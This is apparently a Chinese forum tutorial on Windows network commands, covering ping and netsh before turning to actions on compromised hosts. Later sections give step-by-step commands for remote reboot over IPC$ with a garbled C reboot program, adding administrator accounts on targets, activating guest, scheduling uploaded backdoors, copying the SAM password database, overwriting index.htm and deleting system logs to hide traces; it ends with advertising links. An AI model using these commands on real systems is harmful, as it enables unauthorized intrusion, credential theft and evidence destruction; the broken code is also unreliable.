17）上次说了ping的基本用法，这次谈谈ping的命令参数！
　　
　　 这个是本次问题集的重点部分！无论是小鸟还是老鸟，你们能保证你真的对这些参数了如指掌么？恐怕都未必！还是好好看看吧！
　　
　　 这是TCP／IP协议中最有用的命令之一
　　
　　 它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。
　　
　　 Usage：
ping ［-t］ ［-a］ ［-n count］ ［-l size］ ［-f］ ［-i TTL］ ［-v TOS］
　　 ［-r count］ ［-s
count］ ［［-j host-list］ ［-k host-list］］
　　 ［-w timeout］
destination-list
　　
　　 Options：
　　
　　 -t Ping the specifed host until
interrupted.（除非人为中止，否则一直ping下去）
　　
　　 -a Resolve addresses to
hostnames.（把IP转为主机名）
　　
　　 -n count Number of echo requests to
send.（响应请求的数量）
　　
　　 -l size Send buffer size.（封包的大小）
　　
　　 -f Set
Don`t Fragment flag in packet.（信息包中无碎片）
　　
　　 -i TTL Time To
Live.（时间）
　　
　　 -v TOS Type Of Service.（服务类型）
　　
　　 -r count Record
route for count hops.
　　
　　 -s count Timestamp for count
hops.
　　
　　 -j host-list Loose source route along host-list.
　　
　　 -k
host-list Strict source route along
host-list.（较严格的……唉，怎么译好……算了，放着吧）
　　
　　 -w timeout Timeout in milliseconds
to wait for each reply.（timeout的时间）
　　
　　 比如大家可能都知道的一个命令 # ping -f -s 65000
***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。
　　
　　 其实这个命令主要是用来看对方应答的速度，如果怎么ping
得到的结果都是request time
out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。
　　
　　 18）如何查看本机的DNS服务器？
　　
　　 ipconfig其实是可以的（呵呵，上次就介绍过这个命令），除此以外，还可以利用一个命令：再cmd下输入netsh，进入到netsh>提示符，再输入：int
ip 进入到interface ip>
然后再次输入dump，这时候屏幕上出现当前连接的配置情况了
　　
　　 这里必须介绍一下netsh到底是作什么用的！这个命令比较复杂，他包含了很多的子命令，所以这里只对部分命令进行讲解：
　　
　　 1）查看本机IP：首先键入netsh，再netsh>提示符下输入：interface
回车 之后：ip 回车 再之后：show address 回车
这样，就可以看到当前连接的IP地址和子网掩码。（其实这个命令不如ipconfig简单，也不如ipconfig/all全面）
　　
　　 2）修改网络配置：接着上面的命令，我们使用：set
address name=“本地连接” source=static addr=192.168.0.200
mask=255.255.255.0，这样就修改了当前的IP地址，用show
address来看看（或者用ipconfig）
　　
　　 3）显示一个完整的网络配置教本：
　　
　　 刚才说过，第一个命令显示的信息不如ipconfig/all全面，不用着急，netsh再打印显示网络配置上，还是有自己的特色的！例如：再interface
ip>状态下输入：dump，会显示一个清单，显示所有本地连接（不管你是否使用～）与netstat
-an不完全一样！
　　
　　 这就是netsh的简单介绍和最基础的用法！希望大家能够掌握！还可以输入？来查看帮助！（要在netsh>提示符下才能查看帮助啊～）
　　
　　 19）肉鸡上的部分文件无法删除，怎么办？
　　
　　 如果对方的文件夹是只读的话，会出现拒绝访问的字样！这时候，我们可以再del命令后面加上/f参数来删除！
　　
　　 20）再说一个可以限制用户登陆时间的命令！
　　
　　 再net命令中就可以实现这样的功能！具体方法如下：
　　
　　 假如我们打算让：coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆，用这个命令：
　　
　　 net
user coldcrysky /timesunday-monday,08:00-16:00
　　
　　 之后利用net user
coldcrysky命令来查看登陆时间的限制，可以看到是我们所规定的时间（因为是中文的，很容易懂，我就不多废话了）
　　
　　 在此，特别提醒各位：命令中：星期日才是一周的开始！！！不要当成星期一！
　　
　　 光说了怎么设置，如果想恢复回去怎么办呢？（就是恢复成默认状态，任何时间都可以登陆的状态）
　　
　　 看我的：net
user coldcrysky /time:all
--这样就可以了～
　　
　　 21)如何删除windows2K的默认贡献？
　　
　　 首先打开记事本，输入如下内容：
　　
　　 net
share c$ /delete
　　 net share d$ /delete
　　 net share e$ /delete
　　 net
share f$ /delete
　　 net share g$ /delete
　　 net share ipc$ /delete
　　 net
share admin$
/delete
　　
　　 这里的c$、d$、e$……是代表默认共享的盘符～又几个就设置几个就可以了～
　　
　　 之后点击保存成批处理文件（后缀为：bat的文件！）！加入到启动组中就可以了～
　　
　　 22）139端口的又一用法
　　
　　 呵呵，写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点：1）不要利用本帖所提到的方法去搞恶意破坏！2）呵呵，可能许多人已经知道了139端口这个用法了～本文只想起到一个抛砖引玉的作用！
　　
　　 废话不多说了～开始：
　　
　　 如果你使用NT主机的话，那你可要注意了！
　　 重启NT主机的方法如下：
　　
　　 1：Net
use \\XXX.XXX.XXX.XXX\ipc$ "password"
/user:"username"
　　 建立一个IPC连接
　　
　　 2：net use H:
\\XXX.XXX.XXX.XXX\C$
　　 将对方的C盘映射为自己的h盘
　　
　　 3：copy c on
h:\reboot.bat
　　 Iisreset
/reboot
　　 CTRL+Z
　　 在对方的C盘上生成一个能重启机器的文件
　　
　　 4：net time
\\XXX.XXX.XXX.XXX
　　 得到对方机器时间
　　
　　 5：at \\XXX.XXX.XXX.XXX 重启的时间
c:\reboot.bat
　　 设定对方重启的时间！
　　
　　 6：at
\\XXX.XXX.XXX.XXX
　　 查看任务上面是否添加了这个任务
　　
　　 7：等对方重启好了～
　　
　　 上面的第三步是only
for
Win2K的，如果是Nt，就需要用意个指定的重启程序，我们可以自己编写一个reboot.exe来代替reboot.bat，代码如下：
　　 #include
"stdio.h"
　　 #include "windows.h"
　　 int
main()
　　 {
　　 文件://定义重启的时候发送给所有用户的消息
　　 LPSTR msg="Reboot Tool By
LionHook\nhttp://www.xici.net";;
　　 文件://尝试用最简单的API函数重启
　　 if(ExitWindowXXX(EWX_REBOOT.0))return
TRUE;
　　 if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return
TRUE;
　　 文件://因为上面的重启不成功，所以需要调整本进程的特权
　　 HANDLE
hToken;
　　 TOKEN_PRIVILEGES
tkp;
　　 if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES
|TOKEN_QUERY,&hToken)) return FALSE;
　　 文件://获取重启的特权
SE_SHUTDOWN_NAME
　　 LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
　　 tkp.PrivilegeCount=1;
　　 tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
　　 AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
　　 文件://判断是NT内核还是9X内核，选择用不同的方式
　　 if(!GetVersion()&
0x80000000))
　　 InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
　　 else if
(!ExitWindowXXX(EWX_REBOOT,0))
　　 if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
　　 return
FALSE;
　　 return
TRUE;
　　
　　 对了，再次说明啊，别用本文提到的方法搞破坏，小心警察叔叔打PP～呵呵
23）利用批处理文件来建立一个记录3389登陆者信息的记录器
　　
　　 由于Terminal
Service默认是没有日志记录的，只能依靠他的系统日志，但是系统日志只能记录一些大动作（开启或停止服务），那么，如何用批处理文件来编写一个将是3389端口的程序呢？很简单：
　　
　　 建立一个批处理文件：内容如下：
　　
　　 @echo
off
　　 date/t >> c:\3389log.txt
　　 :TS3389
　　 time/t >>
c:\3389log.txt
　　 netstat -an | find "3389" |find "ESTABLISHED"
>>c:\3389log.txt
　　 goto
:TS3389
　　
　　 之后保存！
　　
　　 如果有人用你的3389登陆你的机器，呵呵，在c盘下就有3389log.txt这个文件！记录了当天日志，还有连接时间……资料～开始反击～呵呵
　　
　　 24）网络命令小节
　　
　　 A、NET命令：
　　
　　 IPC连接：格式
net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接～』
　　 net use \\对方IP\ipc$ /delete
『断开连接～』
　　
　　 以下操作需要在连接到对方主机后才可进行！！！
　　
　　 net user coldcrysky xyz
/add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
　　
　　 net localgroup
Administrator coldcrysky /add
『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊！！！^_^』
　　
　　 net use z:\\对方IP\C$
『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符！』
　　 net start telnet 『开启TELNET』
　　 net user
guest /active:yes 『激活GUEST』
　　 net user guest coldcrysky
『把GUEST密码改为COLDCRYSKY』
　　
　　 B、AT命令：
　　
　　 查看远程机时间：net time
\\对方IP
　　
　　 加入一项新任务：
　　
　　 at \\对方IP 时间 文件名
『用来把自己上传的后门程序在制定时间运行，方便以后进入肉鸡！』
　　
　　 C、TELNET命令：
　　
　　 telnet 对方IP 端口
『作用不用我说了吧？？？』
　　
　　 D、FTP命令：
　　
　　 登陆：ftp
对方网址（IP地址）
　　
　　 上传文件：get 文件在本机完整路径 对方文件存放完整路径
　　
　　 下载文件：put 对方文件完整路径
本机存放文件路径
　　
　　 E、COPY命令：
　　
　　 在建立连接后（尤其是IPC$连接后，很有用的命令哦～）
　　
　　 ⑴copy
index.htm
\\127.0.0.1\c$\index.htm
　　
　　 『将本机index.htm文件复制到127.0.0.1的C盘下，如果要放到对方的NT目录下，则把C改为admin$』
　　
　　 ⑵copy
\\127.0.0.1\admin\repair\sam_ c:
『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令：
　　
　　 主要用于分析目标计算机的基本信息用！具体使用方法请查找相关文件！
　　
　　 G、NBTSTAT命令：
　　
　　 nbtstat
-A 对方IP （这个A大写）
　　
　　 『在其中显示前面的英文或数字就是计算机名称！当然，也可以利用PING -A
对方ip的方法来查看对方主机名！效果相同！！！』
　　
　　 H、SHUTDOWN命令：
　　
　　 『用来关闭对方NT服务的命令』格式如下：
　　 shutdown
\\IP地址
t:20
　　 『20秒后自动关闭对方NT服务！由于对对方机器影响较大，慎用！！！』
　　
　　 I、DIR命令：
　　
　　 还用我说么？大家是不是早就该掌握了？？？（不知道的还是查阅相关资料吧～～～）
　　
　　 J、ECHO命令：
　　
　　 echo
coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
　　 echo coldcrysky
>>index.htm
『把coldcrysky加入到index.htm中』
　　
　　 K、ATTRIB命令：
　　
　　 更改文件属性用，格式：
　　 Attrib
-r index.htm 『去掉只读属性』（＋-
分别代表增加和减少）
　　
　　 L、DEL命令：
　　
　　 『删除日志的时候用！』
　　 del
c:\winnt\system32\logfiles\*.*
　　 del c:\winnt\system32\config\*.evt
　　 del
c:\winnt\system32\dtclog\*.*
　　 del c:\winnt\system32\*.log
　　 del
c:\winnt\system32\*.txt
　　 del c:\winnt\*.txt
　　 del
c:\winnt\*.log
　　
　　 M、PING命令：
　　
　　 -t
：ping制定IP，知道网络断开或按CTRL+C结束！
　　
　　 -a ：解释PING IP的主机名
　　
　　 -n count
：发送count指定的ECHO数据包，默认为4个！

总之，网络管理知识,网络管理经验,网络管理手段,网络管理案例,网络控制技术,网络管理技术,网络管理思路,网络管理方案,网络管理教训,网络管理出路,网络管理趋势,网络管理前沿,网络管理工具,网络管理系统首选聚生网管上网管理软件,可以有效禁止局域网迅雷下载,禁止局域网聊天,禁止局域网炒股,限制局域网玩游戏,过滤局域网网站访问等。

聚生网管电脑控制软件功能介绍：http://www.grabsun.com/ProductShow104.htm

即可下载聚生网管试用：http://www.grabsun.com/download/grabsun.rar